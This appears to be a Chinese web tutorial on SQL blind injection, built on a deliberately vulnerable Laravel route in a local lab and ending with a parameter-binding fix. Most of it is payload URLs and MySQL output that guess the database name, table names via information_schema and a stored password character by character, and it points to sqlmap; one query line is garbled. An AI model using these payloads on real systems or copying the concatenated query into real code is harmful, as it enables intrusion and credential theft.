设为首页 - 加入收藏 ASP站长网(Aspzz.Cn)- 科技、建站、经验、云计算、5G、大数据,站长网!
热搜: 手机 公司 数据
当前位置: 首页 > 站长学院 > PHP教程 > 正文

怎样理解sql盲注原理是什么?

发布时间:2023-02-15 08:48 所属栏目:121 来源:互联网
导读:今天就跟大家聊聊有关如何理解sql盲注原理是什么?的内容,可能很多人都不太了解,为了让大家认识和更进一步的了解,小编给大家总结了以下内容,希望这篇如何理解sql盲注原理是什么?文章能对大家有帮助。 环境 composer create-project laravel/laravel lar
  今天就跟大家聊聊有关“如何理解sql盲注原理是什么?”的内容,可能很多人都不太了解,为了让大家认识和更进一步的了解,小编给大家总结了以下内容,希望这篇“如何理解sql盲注原理是什么?”文章能对大家有帮助。
 
  环境
 
  composer create-project laravel/laravel lar9 // 安装laravel9
 
  // 编辑.env  修改为DEBUG=false 配置数据库
 
  DEBUG=false
 
  DB_HOST=....
 
  php artisan migrate
 
  php artisan serve // 启动
 
  // 插入数据
 
  insert into users(`name`,`email`,`password`) values('xxh','4******qq.com','worldhello');登录后复制
 
  创建漏洞
 
  // routes/web.php
 
  Route::get('/', function () {
 
   $id = request()->id;
 
   $user = \App\Models\User::whereRaw('id = '.$id)->first();
 
   return $user->name ?? '';
 
  });
 
  // 最后转换的sql是: select * from users where id = $id登录后复制
 
  测试
 
  http://127.0.0.1:8000/?id=1'
 
  // 500
 
  http://127.0.0.1:8000/?id=1 and 1=2
 
  // select * from users where id = 1 and 1=2; 返回空
 
  http://127.0.0.1:8000/?id=1 and 1=1
 
  // select * from users where id = 1 and 1=1 返回xxh登录后复制
 
  步骤
 
  数据库名
 
  猜出数据名长度
 
  url: http://127.0.0.1:8000/?id=1 and length(database()) = 1
 
  select * from users where id = 1 and length(database()) = 1
 
  select * from users where id = 1 and length(database()) = 2
 
  // 一直循环下去登录后复制
 
  猜出数据库名
 
  从第一步 知道了数据库名长度
 
  `select * from users where id = 1 and substr(database(),1,1) =a`
 
  `select * from users where id = 1 and substr(database(),1,1) =b`
 
  // 一直循环下去 找到数据库名的第一个做字符  然后找第二个字符  直到找完数据库名的长度登录后复制
 
  最终: laravel_project
 
  表名
 
  以下的步骤和猜数据库差不多,就简说了。
 
  information_schema
 
  information_schema 是 mysql 自带的,
 
  数据库名 表名 列类型 等都有记录,猜表 字段明需要从这个数据库来。
 
  猜 laravel_project 的表数量
 
  url:   http://127.0.0.1:8000/?id=1 and (select count(*) from information_schema.tables where table_schema ="laravel_project" ) = 5
 
  mysql> select count(*) from information_schema.tables where table_schema ="laravel_projeelect count(column_name) from information_schema.columns where table_name= ’usersct";
 
  +----------+
 
  | count(*) |
 
  +----------+
 
  |        5 |
 
  +----------+登录后复制
 
  猜第一个表名的长度
 
  与 [猜出数据名长度] 此不多。
 
  猜第一个表名
 
  url:   http://127.0.0.1:8000/?id=1 and ( select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1) = 'f'
 
  mysql> select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1;
 
  +------------------------+
 
  | substr(table_name,1,1) |
 
  +------------------------+
 
  | f                      |
 
  +------------------------+
 
  // 得出第一个表的第一个字段是f  然后查第登录后复制
 
  最终得出第一个表名称为: failed_jobs
 
  猜字段
 
  和猜表一模一样的逻辑。
 
  select count(column_name) from information_schema.columns where table_name= 'failed_jobs'; //  fail_jobs字段总数登录后复制
 
  猜数据
 
  数据这才是最重要的。
 
  因为 failed_jobs 没数据,所以我换成 users 来。
 
  users 有个 password 字段。
 
  mysql> select substr((select password from users limit 0,1),1,1);
 
  +----------------------------------------------------+
 
  | substr((select password from users limit 0,1),1,1) |
 
  +----------------------------------------------------+
 
  | w                                                  |
 
  +----------------------------------------------------+
 
  得出第一个是w,存起来,最后判断
 
  mysql> select substr((select password from users limit 0,1),1,2);
 
  +----------------------------------------------------+
 
  | substr((select password from users limit 0,1),1,2) |
 
  +----------------------------------------------------+
 
  | wo                                                 |
 
  +----------------------------------------------------+
 
  第二个值为o
 
  用第一个值 + 第二个值作为盲注登录后复制
 
  ……
 
  防御
 
  (有时候 where 不满足需求,就需要 whereRaw)
 
  如果需要,记得绑定就好。
 
  Route::get('/', function () {
 
   $id = request()->id;
 
   $user = \App\Models\User::whereRaw('id = ?',[$id])->first();
 
   return $user->name ?? '';
 
  });登录后复制
 
  只要安份的用框架,不会会漏洞的。
 
  那些老项目,漏洞满地飞。
 
  现在这个时代,找漏洞难登天。
 
  Ps
 
  上面为了讲解简单,用是最简单的查找。
 
  手工盲注应该用二分查找。
 
  select * from users where id = 1 and  substr(database(),1,1) ='a';
 
  换成二分:
 
   select * from users where id = 1 and  ascii(substr(database(),1,1)) > 99;登录后复制
 
  最好还是直接借助工具 sqlmap, 直接扫出来。
 

(编辑:ASP站长网)

    网友评论
    推荐文章
      热点阅读